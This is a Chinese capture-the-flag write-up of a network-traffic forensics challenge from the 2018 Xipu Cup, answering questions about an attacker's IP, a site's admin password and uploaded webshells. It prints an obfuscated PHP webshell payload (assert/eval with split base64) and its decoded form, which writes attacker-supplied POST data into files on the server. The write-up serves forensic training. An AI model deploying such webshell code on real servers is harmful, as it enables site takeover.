西普杯铁三2018——数据赛
重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG
0x01 网站后台密码是多少? 打开第二个数据包
passwd:aabbcc
0x02 攻击者IP是多少? 由上图得出为202.1.1.2
0x03 网站后台登陆地址是多少(http://+IP+路径)?
0x04 后台写入的Webshell内容是什么?
0x05 网站数据库密码是多少?
0x06 黑客第一个上传的php文件名是什么?
array_map("ass"."ert",array("ev"."Al("\$xx=\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9Jy92YXIvd3d3L2h0bWwvZGl5cGFnZS9zY2FuLnBocCc7JGM9JF9QT1NUWyJ6MSJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoJyUnLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCd3JyksJGJ1Zik/JzEnOicwJyk7O2VjaG8oIlhAWSIpO2RpZSgpOw=='));");"));
base64解码
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/scan.php';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
0x07 黑客对内网扫描的范围是多少(ip1-ip2)?
0x08 .黑客下载的数据库备份文件名是什么?
导出http对象,得到:
0x09 黑客上传的图片木马的密码是多少?
0x0A 黑客修改了哪个文件来配合木马文件(绝对路径)?
base64转码:@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/favicon.ico';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
0x0B FTP服务器开在了哪个端口?
转载于:https://my.oschina.net/u/3763247/blog/1818301
西普杯铁三2018——数据赛相关推荐
- 2018西普杯铁三西北赛区流量分析
经典流量分析题目,每次都要拿出来用索性整理好下次方便点 本文所用的WireShark语法 http 显示出所有的HTTP协议数据 ip.addr == xxxx 显示出所有数据中地址为xxxx的包 i ...
- 信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解
前言 由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录 题目分享: 链接: https://pan.baidu.com/s/1b6bkW- ...
- 2018信息安全铁人三项第三赛区数据赛题解
题目链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4 题目描述 1.黑客攻击的第一个受害主机的网卡IP地址 2.黑客对URL的哪 ...
- 铁三2018.5.5数据分析
keep learning 正文 链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4 感谢方方土学长的题解,学习到了一定的套路 题 ...
- 2016 西普杯丶天津CTF预选赛(3/6)
哆啦A梦(图片隐写) 格式:SimCTF{ } 解:放到kail中binwalk一下(Binwalk是一个固件的分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处.简单易用,完全自动化脚本,并 ...
- 1.实验吧_ropbaby(西普杯CTF)_onegadget
分析 1.先查看文件位数,安全机制 2.查看strings,调用函数(特别注意常见的函数) 漏洞点 EXP from pwn import * context.log_level = "de ...
- 常规诊疗条件下比较依那西普生物类似药(益赛普)与阿达木、英夫利西对RA的疗效[EULAR2015_SAT0360]...
常规诊疗条件下比较依那西普生物类似药(益赛普)与阿达木单抗.英夫利西单抗治疗RA的临床疗效 SAT0360 ETANAR - A ETANERCEPT BIOSIMILAR IS AS EFFEC ...
- 2018年 第9届 蓝桥杯 Java B组 省赛真题详解及总结
蓝桥杯 Java B组 省赛决赛 真题详解及小结汇总[2013年(第4届)~2021年(第12届)] 第11届 蓝桥杯-第1.2次模拟(软件类)真题-(2020年3月.4月)-官方讲解视频 说明:部分 ...
- 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...
赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...
最新文章
- struts2学习 - action -3 动态方法调用 DMI
- 记录 grafana登录 从 go 迁移到 php
- 为什么硬盘明明还有空间,linux却说硬盘空间不足?inode;mkdir: 无法创建目录shen1: 设备上没有空间...
- [极客大挑战 2019]BuyFlag
- django1.9的static文件配置
- 再见!“一代神机”iPhone 6或将于今年5月停产 iPhone 7/8降至3500档
- PDF转换技巧之如何把文件转换为WPS?
- 数据中心的重要服务器如何保护?
- (一二一)核心动画基础
- 2020年IPTV系统解决方案应该注意哪些问题?
- video.js的简单用法
- MATLAB递推最小二乘法(三输入一输出ARX模型、所有样本数据权重为1)
- 神经网络的5个应用场景,人工神经网络应用场景
- Qt编译QtXlsx库
- 计算机配置时能关机吗,怎么设置时间让电脑自动关机?
- iMeta高被引论文|陈同/刘永鑫等高颜值绘图网站imageGP被引500次(截止22/12/13)
- 航天信息a3连接不上服务器,航天信息睿财A3使用说明
- onSubmit与onClick的区别
- DWARF调试格式的简介
- 【c51】LCD1602__num++显示 (超详细)
热门文章
- 雷柏 VH650游戏耳机,虚拟7.1声道,听声辨位如身临其境
- 爬取淘宝商家货物简单销售数据,双十一马上就到了,秒杀准备了吗
- 剖析 Microsoft.AspNetCore.Identity 的精髓 ——菜鸟入门
- ps基础学习: ps使用环境介绍
- Linux下数据库连接超时时长,关于.Net Core 部署在Linux下连接SqlServer数据库超时解决办法...
- 快递批量查询:教你几种查看订单详情的办法
- 怎样利用XSS漏洞在其它网站注入链接?
- 基于语义连贯性实现主题挖掘和分类
- python 从开发环境Jenkin下载android安装包
- sony xz2c android升9,索尼Xperia XZ2创尴尬纪录:近几年最厚手机